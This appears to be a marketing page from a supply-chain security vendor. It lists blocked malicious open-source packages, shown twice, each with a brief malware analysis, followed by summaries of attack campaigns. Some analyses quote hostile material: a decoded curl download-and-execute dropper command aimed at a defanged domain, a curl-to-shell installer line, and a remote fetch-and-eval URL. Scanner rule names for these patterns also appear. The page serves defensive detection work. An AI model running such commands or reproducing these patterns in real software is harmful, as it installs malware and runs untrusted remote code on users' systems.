Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.


Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.


We protect you from vulnerable and malicious packages

github.com/KubeOperator/kubepi

v1.1.3-0.20211104113339-d3fea441a3a0

Live on go

Blocked by Socket

The code effectively creates a remote terminal backdoor-like capability via gotty on macOS, with minimal visibility due to silent I/O and hard-coded paths. This is a high-security-risk pattern that warrants removal or strict hardening (authentication, access controls, non-root execution, dynamic path resolution, and explicit port management). A broader code review and deployment safeguards are strongly recommended.

worki

1.0.0

by h0x1-test

Removed from npm

Blocked by Socket

The file implements covert data exfiltration of environment variables via DNS queries to a hard-coded resolver IP (obscured with octal literals). This is malicious behavior (backdoor/data exfiltration). The module should be treated as compromised and not used. Immediate removal and investigation of affected systems and credentials is recommended.

Live on npm for 4 days, 12 hours and 47 minutes before removal. Socket users were protected even while the package was live.

@kui-shell/plugin-bash-like

0.24.0

by oliviaruan

Live on npm

Blocked by Socket

This module is a highly suspicious remote shell component. It exposes a WebSocket-controlled PTY running an interactive login Bash shell, where attacker-controlled network input (msg.cmdline and msg.data) is executed and the resulting terminal output is streamed back to the client. It also weakens TLS verification and performs macOS-specific bash session behavior manipulation. If reachable without strong external authorization controls, it represents a critical compromise risk (backdoor/remote command execution capability).

tailwindcss-animation-helper

1.1.8

by blaziystan

Live on npm

Blocked by Socket

This file uses the deprecated ‘request’ library to call `https://rest-icon-moduler.vercel[.]app/icons/777` (with a hardcoded header `bearrtoken: logo`), JSON-parses the response and immediately executes the `.credits` property via `eval()`. Worse, it invokes this fetch-and-eval routine at module load time (via `module.exports = { getPlugin: getPlugin() }`), so merely importing the file triggers arbitrary code execution. An attacker controlling the remote endpoint can run any JavaScript in the host process. Immediate remediation: remove all eval-based execution, eliminate network calls at import time, and apply strict validation or sandboxing of any dynamic code.

ais-dom

0.115.6b0

Live on pypi

Blocked by Socket

The code implements an automatic updater that sends detailed local identifiers and environment information to a hardcoded remote service, and crucially it accepts server-supplied scripts and packages which it writes to disk and executes without integrity checks or signing. That behavior allows arbitrary remote code execution and software replacement (including on Android via su/am), and untrusted network responses can directly drive local shell commands and package installations. While the functionality appears intended for legitimate updates, the lack of verification and the use of shell execution and privileged Android commands represent a significant supply-chain and remote-execution risk. Avoid using this module or ensure the updater endpoint and transport are fully trusted and protected; implement code-signing and strict validation before executing remote-provided artifacts.

hackpy

0.1.3

Live on pypi

Blocked by Socket

This code is malicious or part of a malicious toolkit. It includes credential harvesting (Chrome password recovery), remote-hosted binaries download and execution from a hardcoded attacker-controlled server, persistence via autorun, ability to disable system protections (UAC, Task Manager), and privacy-invasive features (webcam capture, clipboard access). Do not run or ship this package; treat it as high-risk malware. Further analysis of downloaded binaries (nircmd.exe, webcam.exe) and any network interactions with the hardcoded server are strongly recommended.

nerdwallet-blocks

2.0.1

by recon098

Removed from npm

Blocked by Socket

The code is malware that exfiltrates data through DNS queries to a suspicious domain, collects system information without consent, and communicates this data externally.

Live on npm for 22 hours and 10 minutes before removal. Socket users were protected even while the package was live.

bloodq

1

Live on pypi

Blocked by Socket

This code is largely a legitimate-looking build backend but contains several clear malicious or at-minimum suspicious constructs: an unguarded os.system shell chain that strips and packs the produced binary and moves it to a hardcoded '/sdcard/BLooD' path, an Arabic instruction message telling how to locate a file named NASR.py, use of upx to obfuscate the binary, and possible command injection risk due to unescaped shell interpolation. These actions are consistent with exfiltration and post-build payload staging (copying artifacts to removable storage and obfuscating them). Combined with the anomalous text and the hardcoded target, this indicates intentional malicious behavior in the module. I recommend not using this package and treating artifacts produced by it as suspicious. The file also contains syntax errors at the end, suggesting tampering or truncation; further corroboration with the published package version is needed.

ruzickap/action-my-broken-link-checker

8cf503c62c15051b611c8aff7a08df8f002005df

Live on actions

Blocked by Socket

This workflow presents a significant supply-chain risk: it executes code directly from repository documentation without validation or isolation. If an attacker can inject malicious bash blocks into README.md, they can cause arbitrary commands to run in CI, potentially compromising the build environment, leaking secrets, exfiltrating data, or installing malware. It is highly advisable to remove automatic execution of code blocks or implement strict vetting, sandboxing, or safe-guarded execution (e.g., running in a disposable container with restricted permissions and only whitelisted commands). Additionally, restrict PRs from triggering destructive or network-facing actions and consider requiring maintainer approval for code-block execution.

@levibostian/decaf-script-git

0.0.0

by levibostian

Live on npm

Blocked by Socket

This module is a highly suspicious installer/runner that performs immediate remote code execution using a curl|bash pipeline from a mutable GitHub HEAD URL without integrity verification or pinning. It then executes a local binary while forwarding untrusted CLI arguments through a shell-parsed execSync string, increasing the likelihood of command-parsing/injection issues. Treat this dependency as unsafe in a typical supply-chain context unless the remote installer and resulting binary are fully verified and pinned to immutable, integrity-checked artifacts.

aiges

0.9.0

Live on pypi

Blocked by Socket

This code exhibits multiple suspicious behaviors including API key mishandling, hardcoded suspicious WebSocket endpoints, and arbitrary network connectivity that could facilitate data theft or backdoor access. The pattern of collecting API keys then clearing them, combined with WebSocket communication to suspicious endpoints, strongly suggests malicious intent.

nwebclient

1.0.316

Live on pypi

Blocked by Socket

This module implements remote job fetching and execution primitives with dynamic class loading, web and MQTT interfaces, and multiple default network endpoints (notably hardcoded bsnx.net URLs). It does not appear obfuscated or explicitly destructive, but it provides many powerful remote-control and data-exfiltration capabilities without validation or sandboxing. If untrusted inputs or default endpoints are reachable, an attacker can cause arbitrary code to be imported and executed, files to be written, and internal Python objects to be exposed. Treat as high security risk and audit/lock configuration and network access before use.

driverless-acquisition-blue-auth-token-validator

0.5.0-0

by h1tester12332

Removed from npm

Blocked by Socket

The script collects information like the package name, directory, home directory, hostname, username, DNS servers and package JSON data, and sends it to a remote server.

Live on npm for 1 day, 22 hours and 7 minutes before removal. Socket users were protected even while the package was live.

354766/koatora20/guard-scanner/guard-scanner/

750b5c6c3b3a8021cc83d488def4b0a8b8a66e77

Live on socket

Blocked by Socket

This package is malicious or extremely high risk. The postinstall hook executes a remote script via curl|bash (direct remote code execution). The package also pulls a dependency via a git URL (non-registry source) and uses unpinned dependency specifiers. Do not install this package. Treat any systems that have installed it as compromised until you can audit them.

aspidites

1.5.2

Live on pypi

Blocked by Socket

The code implements a high-risk dynamic evaluation pattern by evaluating tokens within the caller’s scope. This creates a strong possibility of arbitrary code execution and data leakage if tokens originate from untrusted inputs. Hardening should include removing eval, replacing it with safe resolvers, sandboxing, or strict token whitelisting, and restricting scope access. This pattern is unsuitable for trusted libraries exposed in open-source supply chains without significant safeguards.

monolith-twirp-secretscanning-blobs

9999.9999.9999

by Ohio Schools R1 Admin

Live on rubygems

Blocked by Socket

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

@twork-data-services/proxy-prime-api-v6-customer-account-lite-info

1.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

354766/1nf-sh/skills/ai-rag-pipeline/

7e1fb7e75fa06d2526dcc700e8a342d9540c9344

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected

The skill documentation itself describes legitimate RAG pipeline usage and its capabilities align with the stated purpose. I found no code-level malware, hardcoded secrets, or obfuscated backdoors in the provided content. However, there are operational supply-chain and privacy risks: it recommends running a remote installer with 'curl | sh', routes user queries and document contents through inference.sh and third-party app endpoints (potentially exposing sensitive data), and grants broad shell/infsh permissions. These behaviors are coherent with the tool's purpose but increase trust requirements. Recommend reviewing the infsh installer and operator privacy/persistence policies before use, avoid piping unknown install scripts, and ensure sensitive data is redacted before sending to remote extractors/LLMs.

LLM verification: The SKILL.md serves as a functional guide for composing RAG pipelines using the inference.sh CLI and hosted third-party apps. The document contains operational security risks rather than code-level malware: notably the use of the curl|sh installer pattern and the advice to forward raw extracted content to hosted LLM endpoints without redaction or credential-handling guidance. There is no evidence in the markdown of obfuscated code or embedded backdoors, but the installer pattern and centralized data

n8n-nodes-ggdv-hdfvcnnje-uyrokvbkl

0.0.38

by kakashi-hatake

Removed from npm

Blocked by Socket

The provided code fragment is heavily obfuscated but, in isolation, appears to implement a simple factory that returns a create-operation object when inputs satisfy certain conditions. There is no direct evidence in this snippet of malicious activity such as eval, network exfiltration, secret harvesting, or spawning processes. The obfuscation is concerning and warrants caution: the omitted parts of the module (the a27_0x... functions and other referenced variables) should be inspected to ensure they do not perform hidden network requests, decode and execute code, or read environment/credential data. Overall, the fragment is likely benign but the surrounding obfuscated code should be reviewed.

Live on npm for 5 hours and 57 minutes before removal. Socket users were protected even while the package was live.

ailever

0.2.416

Live on pypi

Blocked by Socket

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.

corio

2.0.17

Live on pypi

Blocked by Socket

The script contains a high-risk backdoor-like capability: when FMTR_DEV is enabled, it opens root SSH access with a hardcoded password, dumps environment data, and runs SSH in foreground with verbose logging. This undermines container isolation, enables remote compromise, and poses severe supply-chain security risks. It should be removed or replaced with secure, auditable behavior (e.g., disallow root SSH, use proper authentication via keys, avoid dumping environment, and validate inputs).

354766/inference-sh-6/skills/ai-podcast-creation/

8df5202816d8eaa20b95dbc5ae2bc8f9e9850fb6

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected

All findings:
[CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4]
[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]
[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]

This skill documentation is functionally consistent with its claimed purpose (AI podcast creation), but contains high-risk supply-chain and data-flow patterns: it instructs a curl | sh install of a remote CLI, routes user content and generated artifacts through hosted inference.sh endpoints, and chains multiple hosted services which could forward credentials or sensitive content. There is no explicit evidence of obfuscated malware or hardcoded secrets, so it does not appear to contain confirmed malware, but the download-and-execute pattern and centralized remote processing raise moderate-to-high security concerns. Recommend: avoid using the one-line curl|sh installation without manual verification; review infsh privacy/retention and authentication behavior; prefer pinned, auditable installs and understand who controls the hosted endpoints before uploading sensitive content.

LLM verification: This skill is plausible and functionally aligned with its stated purpose (AI podcast creation). The main supply-chain/security concern is the recommended pipe-to-shell installer (curl -fsSL https://cli.inference.sh | sh) which downloads and executes remote code; even with published checksums, this pattern is high-risk. Additionally, the workflow routes all user scripts/documents to hosted inference apps (inference.sh/openrouter/etc.), which is expected for a hosted service but increases exposure

cl-lite

1.0.1177

by michael_tian

Live on npm

Blocked by Socket

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

github.com/bishopfox/sliver

v1.5.40-0.20241202233958-11dc6bac4d3b

Live on go

Blocked by Socket

This source is a network transport implementation for the Sliver C2 implant: it initializes encrypted sessions with a remote C2, polls for commands, and sends responses. It is intentionally designed for covert command-and-control and therefore represents malicious/backdoor behavior in a supply chain context. The code uses insecure math/rand for nonces and request randomization (crypto weakness). There are no hardcoded credentials or obvious obfuscation in this fragment, but templated values can insert configurable headers/paths and proxies at build/runtime. Recommendation: treat this package as malicious in context (implant) and do not include it in trusted software supply chains. If analyzing for defensive purposes, review use of cryptography, replace math/rand where cryptographic randomness is required, and carefully audit how options (proxy creds, host header) are supplied and stored.

bffhfuruhejfhdj

1.0.0

by testiui78777

Live on npm

Blocked by Socket

The code is a clear implementation of a reverse shell, posing a significant security risk by allowing remote command execution. It is not obfuscated, but its functionality is inherently malicious.

github.com/KubeOperator/kubepi

v1.1.3-0.20211104113339-d3fea441a3a0

Live on go

Blocked by Socket

The code effectively creates a remote terminal backdoor-like capability via gotty on macOS, with minimal visibility due to silent I/O and hard-coded paths. This is a high-security-risk pattern that warrants removal or strict hardening (authentication, access controls, non-root execution, dynamic path resolution, and explicit port management). A broader code review and deployment safeguards are strongly recommended.

worki

1.0.0

by h0x1-test

Removed from npm

Blocked by Socket

The file implements covert data exfiltration of environment variables via DNS queries to a hard-coded resolver IP (obscured with octal literals). This is malicious behavior (backdoor/data exfiltration). The module should be treated as compromised and not used. Immediate removal and investigation of affected systems and credentials is recommended.

Live on npm for 4 days, 12 hours and 47 minutes before removal. Socket users were protected even while the package was live.

@kui-shell/plugin-bash-like

0.24.0

by oliviaruan

Live on npm

Blocked by Socket

This module is a highly suspicious remote shell component. It exposes a WebSocket-controlled PTY running an interactive login Bash shell, where attacker-controlled network input (msg.cmdline and msg.data) is executed and the resulting terminal output is streamed back to the client. It also weakens TLS verification and performs macOS-specific bash session behavior manipulation. If reachable without strong external authorization controls, it represents a critical compromise risk (backdoor/remote command execution capability).

tailwindcss-animation-helper

1.1.8

by blaziystan

Live on npm

Blocked by Socket

This file uses the deprecated ‘request’ library to call `https://rest-icon-moduler.vercel[.]app/icons/777` (with a hardcoded header `bearrtoken: logo`), JSON-parses the response and immediately executes the `.credits` property via `eval()`. Worse, it invokes this fetch-and-eval routine at module load time (via `module.exports = { getPlugin: getPlugin() }`), so merely importing the file triggers arbitrary code execution. An attacker controlling the remote endpoint can run any JavaScript in the host process. Immediate remediation: remove all eval-based execution, eliminate network calls at import time, and apply strict validation or sandboxing of any dynamic code.

ais-dom

0.115.6b0

Live on pypi

Blocked by Socket

The code implements an automatic updater that sends detailed local identifiers and environment information to a hardcoded remote service, and crucially it accepts server-supplied scripts and packages which it writes to disk and executes without integrity checks or signing. That behavior allows arbitrary remote code execution and software replacement (including on Android via su/am), and untrusted network responses can directly drive local shell commands and package installations. While the functionality appears intended for legitimate updates, the lack of verification and the use of shell execution and privileged Android commands represent a significant supply-chain and remote-execution risk. Avoid using this module or ensure the updater endpoint and transport are fully trusted and protected; implement code-signing and strict validation before executing remote-provided artifacts.

hackpy

0.1.3

Live on pypi

Blocked by Socket

This code is malicious or part of a malicious toolkit. It includes credential harvesting (Chrome password recovery), remote-hosted binaries download and execution from a hardcoded attacker-controlled server, persistence via autorun, ability to disable system protections (UAC, Task Manager), and privacy-invasive features (webcam capture, clipboard access). Do not run or ship this package; treat it as high-risk malware. Further analysis of downloaded binaries (nircmd.exe, webcam.exe) and any network interactions with the hardcoded server are strongly recommended.

nerdwallet-blocks

2.0.1

by recon098

Removed from npm

Blocked by Socket

The code is malware that exfiltrates data through DNS queries to a suspicious domain, collects system information without consent, and communicates this data externally.

Live on npm for 22 hours and 10 minutes before removal. Socket users were protected even while the package was live.

bloodq

1

Live on pypi

Blocked by Socket

This code is largely a legitimate-looking build backend but contains several clear malicious or at-minimum suspicious constructs: an unguarded os.system shell chain that strips and packs the produced binary and moves it to a hardcoded '/sdcard/BLooD' path, an Arabic instruction message telling how to locate a file named NASR.py, use of upx to obfuscate the binary, and possible command injection risk due to unescaped shell interpolation. These actions are consistent with exfiltration and post-build payload staging (copying artifacts to removable storage and obfuscating them). Combined with the anomalous text and the hardcoded target, this indicates intentional malicious behavior in the module. I recommend not using this package and treating artifacts produced by it as suspicious. The file also contains syntax errors at the end, suggesting tampering or truncation; further corroboration with the published package version is needed.

ruzickap/action-my-broken-link-checker

8cf503c62c15051b611c8aff7a08df8f002005df

Live on actions

Blocked by Socket

This workflow presents a significant supply-chain risk: it executes code directly from repository documentation without validation or isolation. If an attacker can inject malicious bash blocks into README.md, they can cause arbitrary commands to run in CI, potentially compromising the build environment, leaking secrets, exfiltrating data, or installing malware. It is highly advisable to remove automatic execution of code blocks or implement strict vetting, sandboxing, or safe-guarded execution (e.g., running in a disposable container with restricted permissions and only whitelisted commands). Additionally, restrict PRs from triggering destructive or network-facing actions and consider requiring maintainer approval for code-block execution.

@levibostian/decaf-script-git

0.0.0

by levibostian

Live on npm

Blocked by Socket

This module is a highly suspicious installer/runner that performs immediate remote code execution using a curl|bash pipeline from a mutable GitHub HEAD URL without integrity verification or pinning. It then executes a local binary while forwarding untrusted CLI arguments through a shell-parsed execSync string, increasing the likelihood of command-parsing/injection issues. Treat this dependency as unsafe in a typical supply-chain context unless the remote installer and resulting binary are fully verified and pinned to immutable, integrity-checked artifacts.

aiges

0.9.0

Live on pypi

Blocked by Socket

This code exhibits multiple suspicious behaviors including API key mishandling, hardcoded suspicious WebSocket endpoints, and arbitrary network connectivity that could facilitate data theft or backdoor access. The pattern of collecting API keys then clearing them, combined with WebSocket communication to suspicious endpoints, strongly suggests malicious intent.

nwebclient

1.0.316

Live on pypi

Blocked by Socket

This module implements remote job fetching and execution primitives with dynamic class loading, web and MQTT interfaces, and multiple default network endpoints (notably hardcoded bsnx.net URLs). It does not appear obfuscated or explicitly destructive, but it provides many powerful remote-control and data-exfiltration capabilities without validation or sandboxing. If untrusted inputs or default endpoints are reachable, an attacker can cause arbitrary code to be imported and executed, files to be written, and internal Python objects to be exposed. Treat as high security risk and audit/lock configuration and network access before use.

driverless-acquisition-blue-auth-token-validator

0.5.0-0

by h1tester12332

Removed from npm

Blocked by Socket

The script collects information like the package name, directory, home directory, hostname, username, DNS servers and package JSON data, and sends it to a remote server.

Live on npm for 1 day, 22 hours and 7 minutes before removal. Socket users were protected even while the package was live.

354766/koatora20/guard-scanner/guard-scanner/

750b5c6c3b3a8021cc83d488def4b0a8b8a66e77

Live on socket

Blocked by Socket

This package is malicious or extremely high risk. The postinstall hook executes a remote script via curl|bash (direct remote code execution). The package also pulls a dependency via a git URL (non-registry source) and uses unpinned dependency specifiers. Do not install this package. Treat any systems that have installed it as compromised until you can audit them.

aspidites

1.5.2

Live on pypi

Blocked by Socket

The code implements a high-risk dynamic evaluation pattern by evaluating tokens within the caller’s scope. This creates a strong possibility of arbitrary code execution and data leakage if tokens originate from untrusted inputs. Hardening should include removing eval, replacing with safe resolvers, sandboxing, or strict token whitelisting and restricting scope access. This pattern is unsuitable for trusted libraries exposes in open-source supply chains without significant safeguards.

monolith-twirp-secretscanning-blobs

9999.9999.9999

by Ohio Schools R1 Admin

Live on rubygems

Blocked by Socket

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

@twork-data-services/proxy-prime-api-v6-customer-account-lite-info

1.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

354766/1nf-sh/skills/ai-rag-pipeline/

7e1fb7e75fa06d2526dcc700e8a342d9540c9344

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected The skill documentation itself describes legitimate RAG pipeline usage and its capabilities align with the stated purpose. I found no code-level malware, hardcoded secrets, or obfuscated backdoors in the provided content. However, there are operational supply-chain and privacy risks: it recommends running a remote installer with 'curl | sh', routes user queries and document contents through inference.sh and third-party app endpoints (potentially exposing sensitive data), and grants broad shell/infsh permissions. These behaviors are coherent with the tool's purpose but increase trust requirements. Recommend reviewing the infsh installer and operator privacy/persistence policies before use, avoid piping unknown install scripts, and ensure sensitive data is redacted before sending to remote extractors/LLMs. LLM verification: The SKILL.md serves as a functional guide for composing RAG pipelines using the inference.sh CLI and hosted third-party apps. The document contains operational security risks rather than code-level malware: notably the use of curl|sh installer pattern and the advice to forward raw extracted content to hosted LLM endpoints without redaction or credential-handling guidance. There is no evidence in the markdown of obfuscated code or embedded backdoors, but the installer pattern and centralized data

n8n-nodes-ggdv-hdfvcnnje-uyrokvbkl

0.0.38

by kakashi-hatake

Removed from npm

Blocked by Socket

The provided code fragment is heavily obfuscated but, in isolation, appears to implement a simple factory that returns a create-operation object when inputs satisfy certain conditions. There is no direct evidence in this snippet of malicious activity such as eval, network exfiltration, secret harvesting, or spawning processes. The obfuscation is concerning and warrants caution: the omitted parts of the module (the a27_0x... functions and other referenced variables) should be inspected to ensure they do not perform hidden network requests, decode and execute code, or read environment/credential data. Overall, the fragment is likely benign but the surrounding obfuscated code should be reviewed.

Live on npm for 5 hours and 57 minutes before removal. Socket users were protected even while the package was live.

ailever

0.2.416

Live on pypi

Blocked by Socket

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.

corio

2.0.17

Live on pypi

Blocked by Socket

The script contains a high-risk backdoor-like capability: when FMTR_DEV is enabled, it opens root SSH access with a hardcoded password, dumps environment data, and runs SSH in the foreground with verbose logging. This undermines container isolation, enables remote compromise, and poses severe supply-chain security risks. It should be removed or replaced with secure, auditable behavior (e.g., disallow root SSH, use proper key-based authentication, avoid dumping the environment, and validate inputs).

354766/inference-sh-6/skills/ai-podcast-creation/

8df5202816d8eaa20b95dbc5ae2bc8f9e9850fb6

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected

All findings:
[CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4]
[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]
[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]

This skill documentation is functionally consistent with its claimed purpose (AI podcast creation), but contains high-risk supply-chain and data-flow patterns: it instructs a curl | sh install of a remote CLI, routes user content and generated artifacts through hosted inference.sh endpoints, and chains multiple hosted services which could forward credentials or sensitive content. There is no explicit evidence of obfuscated malware or hardcoded secrets, so it does not appear to contain confirmed malware, but the download-and-execute pattern and centralized remote processing raise moderate-to-high security concerns. Recommend: avoid using the one-line curl|sh installation without manual verification; review infsh privacy/retention and authentication behavior; prefer pinned, auditable installs and understand who controls the hosted endpoints before uploading sensitive content.

LLM verification: This skill is plausible and functionally aligned with its stated purpose (AI podcast creation). The main supply-chain/security concern is the recommended pipe-to-shell installer (curl -fsSL https://cli.inference.sh | sh) which downloads and executes remote code; even with published checksums, this pattern is high-risk. Additionally, the workflow routes all user scripts/documents to hosted inference apps (inference.sh/openrouter/etc.), which is expected for a hosted service but increases exposure

cl-lite

1.0.1177

by michael_tian

Live on npm

Blocked by Socket

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

github.com/bishopfox/sliver

v1.5.40-0.20241202233958-11dc6bac4d3b

Live on go

Blocked by Socket

This source is a network transport implementation for the Sliver C2 implant: it initializes encrypted sessions with a remote C2, polls for commands, and sends responses. It is intentionally designed for covert command-and-control and therefore represents malicious/backdoor behavior in a supply chain context. The code uses insecure math/rand for nonces and request randomization (crypto weakness). There are no hardcoded credentials or obvious obfuscation in this fragment, but templated values can insert configurable headers/paths and proxies at build/runtime. Recommendation: treat this package as malicious in context (implant) and do not include it in trusted software supply chains. If analyzing for defensive purposes, review use of cryptography, replace math/rand where cryptographic randomness is required, and carefully audit how options (proxy creds, host header) are supplied and stored.

bffhfuruhejfhdj

1.0.0

by testiui78777

Live on npm

Blocked by Socket

The code is a clear implementation of a reverse shell, posing a significant security risk by allowing remote command execution. It is not obfuscated, but its functionality is inherently malicious.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

Unstable ownership

55 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.

RUST: crates.io (Rust Package Manager)
PHP: Packagist (PHP Package Manager)
GOLANG: Go Modules (Go Dependency Management)
JAVA: Maven Central
JAVASCRIPT: npm (Node Package Manager)
.NET: NuGet (.NET Package Manager)
PYTHON: PyPI (Python Package Index)
RUBY: RubyGems.org (Ruby Package Manager)
SWIFT: Swift
AI: Hugging Face Hub (AI Model Hub)
CI: GitHub Actions (CI/CD Workflows)
EXTENSIONS: Chrome Web Store (Chrome Browser Extensions)
EXTENSIONS: Open VSX (VS Code Extensions)

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
